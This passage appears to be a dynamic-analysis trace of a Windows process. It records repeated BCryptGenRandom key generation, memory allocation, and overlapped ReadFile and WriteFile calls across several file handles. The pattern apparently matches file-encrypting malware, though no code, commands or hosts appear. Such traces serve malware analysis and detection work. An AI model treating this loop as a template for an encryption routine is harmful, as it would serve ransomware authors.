pbBuffer=0x2faf970) returned 0x0 [0172.633] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0172.633] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0172.633] free (_Block=0x3e305b8) [0172.633] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0172.633] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0172.633] free (_Block=0x1fa91d0) [0172.633] free (_Block=0x1fa2ed8) [0172.633] free (_Block=0x1fa90b8) [0172.633] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0172.633] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0172.777] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0172.778] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0172.778] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0172.778] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0172.779] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0172.779] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0172.779] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0172.779] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0172.779] free (_Block=0x3e305b8) [0172.779] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0172.779] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0172.780] free (_Block=0x1fa91d0) [0172.780] free (_Block=0x77d7a8) [0172.780] free (_Block=0x1fa90b8) [0172.780] WriteFile (in: hFile=0xec, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x619, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0172.780] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0172.790] ReadFile (in: hFile=0xec, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xc5d7, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0172.793] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0172.844] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0xa0e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0172.845] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0173.338] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0xf440, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0173.338] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0173.381] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.504] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.505] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0173.505] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.505] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.505] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0173.505] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0173.506] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0173.506] free (_Block=0x3e305b8) [0173.506] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0173.506] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0173.506] free (_Block=0x1fa91d0) [0173.506] free (_Block=0x1fa2ed8) [0173.506] free (_Block=0x1fa90b8) [0173.506] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0173.507] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0173.511] ReadFile (in: hFile=0x308, lpBuffer=0x3fb00ec, nNumberOfBytesToRead=0x321f, lpNumberOfBytesRead=0x0, lpOverlapped=0x3fb00b8 | out: lpBuffer=0x3fb00ec*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3fb00b8) returned 1 [0173.515] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0173.532] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.659] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.659] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0173.659] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.659] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.659] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0173.659] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0173.659] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0173.659] free (_Block=0x3e305b8) [0173.659] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0173.659] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0173.660] free (_Block=0x1fa91d0) [0173.660] free (_Block=0x1fa2ed8) [0173.660] free (_Block=0x1fa90b8) [0173.660] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0173.660] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0173.661] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0xbdb0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0173.662] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0173.680] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x278a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0173.765] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0173.808] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.809] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.809] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0173.809] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.809] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.809] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0173.809] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0173.809] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0173.809] free (_Block=0x3e305b8) [0173.809] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0173.809] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0173.809] free (_Block=0x1fa91d0) [0173.810] free (_Block=0x1fa2ed8) [0173.810] free (_Block=0x1fa90b8) [0173.810] WriteFile (in: hFile=0x338, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0173.810] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0173.811] WriteFile (in: hFile=0x338, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x20e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0173.811] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0173.819] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.820] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.820] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0173.820] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.820] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.820] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0173.820] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0173.820] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0173.820] free (_Block=0x3e305b8) [0173.821] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0173.821] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0173.821] free (_Block=0x1fa91d0) [0173.821] free (_Block=0x1fa2ed8) [0173.821] free (_Block=0x1fa90b8) [0173.821] WriteFile (in: hFile=0xec, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0173.821] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0173.822] WriteFile (in: hFile=0xec, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x1dc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0173.822] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0173.839] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.958] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.958] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0173.958] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.958] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.958] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0173.959] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0173.959] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0173.959] free (_Block=0x3e305b8) [0173.959] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0173.959] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0173.959] free (_Block=0x1fa91d0) [0173.959] free (_Block=0x1fa2ed8) [0173.959] free (_Block=0x1fa90b8) [0173.959] WriteFile (in: hFile=0xec, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0173.960] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0174.926] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0174.941] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0174.941] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0174.941] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0174.941] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0174.941] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0174.942] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0174.942] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0174.942] free (_Block=0x3e305b8) [0174.942] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0174.942] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0174.942] free (_Block=0x1fa91d0) [0174.942] free (_Block=0x1fa2ed8) [0174.942] free (_Block=0x1fa90b8) [0174.942] WriteFile (in: hFile=0xec, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0174.943] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0174.944] WriteFile (in: hFile=0xec, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x2250, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0174.944] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0175.022] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x2926, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0175.024] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0175.043] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.044] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.044] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0175.044] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.044] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.044] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0175.044] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.044] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.044] free (_Block=0x3e305b8) [0175.044] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.044] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.045] free (_Block=0x1fa91d0) [0175.045] free (_Block=0x1fa2ed8) [0175.045] free (_Block=0x1fa90b8) [0175.045] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0175.047] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0175.057] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.058] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.058] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0175.058] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.058] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.058] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0175.058] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.058] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.058] free (_Block=0x3e305b8) [0175.059] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.059] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.059] free (_Block=0x1fa91d0) [0175.059] free (_Block=0x1fa2ed8) [0175.059] free (_Block=0x1fa90b8) [0175.059] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0175.061] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0175.071] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.072] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.072] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0175.072] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.072] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.072] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0175.072] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.072] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.072] free (_Block=0x3e305b8) [0175.072] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.073] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.073] free (_Block=0x1fa91d0) [0175.073] free (_Block=0x1fa2ed8) [0175.073] free (_Block=0x1fa90b8) [0175.073] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0175.074] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0175.083] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x1f80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0175.084] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0175.098] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.098] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.099] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0175.099] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.099] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.099] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0175.100] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.100] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.100] free (_Block=0x3e305b8) [0175.100] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.100] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.100] free (_Block=0x1fa91d0) [0175.100] free (_Block=0x1fa2ed8) [0175.100] free (_Block=0x1fa90b8) [0175.100] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0175.102] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0175.111] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.112] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.112] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0175.112] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.113] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.113] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0175.113] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.113] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.113] free (_Block=0x3e305b8) [0175.113] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.113] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.114] free (_Block=0x1fa91d0) [0175.114] free (_Block=0x1fa2ed8) [0175.114] free (_Block=0x1fa90b8) [0175.114] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 